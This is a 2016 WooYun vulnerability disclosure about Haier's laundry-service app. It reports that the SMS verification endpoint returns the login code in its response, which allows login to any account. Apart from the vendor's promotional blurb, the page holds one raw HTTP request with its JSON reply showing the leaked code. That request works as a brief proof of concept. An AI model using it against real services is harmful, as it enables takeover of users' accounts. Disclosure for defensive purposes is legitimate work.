WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0171449

漏洞标题：海尔洗衣任意账户登录

相关厂商：北京海狸先生网络科技有限公司

漏洞作者： orange

提交时间：2016-01-20 20:29

修复时间：2016-03-05 09:52

公开时间：2016-03-05 09:52

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2016-01-20： 积极联系厂商并且等待厂商认领中，细节不对外公开
2016-03-05： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

北京海狸先生网络科技有限公司（简称：海狸公司）由海尔集团和小村资本联合投资，并于2015年7月正式注册成立并投入运营。海狸公司秉着专业、快捷、标准化的服务准则，为享受慢生活和懒人生活的你提供最贴心的洗衣服务。
海尔洗衣APP是海尔集团旗下专注洗衣O2O服务的品牌。海尔洗衣基于LBS定位系统为你提供高品质的标准化清洗、取送衣物和家居寝具等专业服务。
我们的宗旨：专业、快捷、标准化、贴心、为您省钱。
我们服务的对象：想从繁重的洗衣晾衣作业中摆脱出来的你；享受慢生活和懒人生活的你！
我们的使命：站在世界级品牌的肩膀上创造垂直领域移动互联新纪元!
我们的里程：
2015年7月，北京海狸先生网络科技有限公司由海尔集团和小村资本联合完成投资，并正式注册成立投入运营。
2015年9月25日，海狸公司参加“2015秋季正和岛创新大集暨山东岛邻机构两周年庆典”，并从3000多个创新项目中突破重围，荣获优秀项目奖。
2015年11月19日，海狸窝校园创客平台招募正式开始，全新的校园兼职体验从此开始。
2015年12月15日，海尔联合北京大学、教育部等多家机构在北京大学召开发布会，“海尔•海狸大学生创业平台”正式成立。

详细说明：

http://www.mrhi.cn

POST /saywash/WashCallApi/common/user/requestVerifyCode.api HTTP/1.1
Host: www.saywash.com
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 32
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-Hans-CN;q=1
Connection: keep-alive
User-Agent: HAIERWHM/1.0.3 (iPhone; iOS 9.0.2; Scale/2.00)
phoneNumber=18888888888&tokenId=

{
	"retCode": "00000",
	"retInfo": "操作成功",
	"data": {
		"verifyCode": "7080"
	}
}

漏洞证明：

修复方案：

版权声明：转载请注明来源 orange@乌云

漏洞回应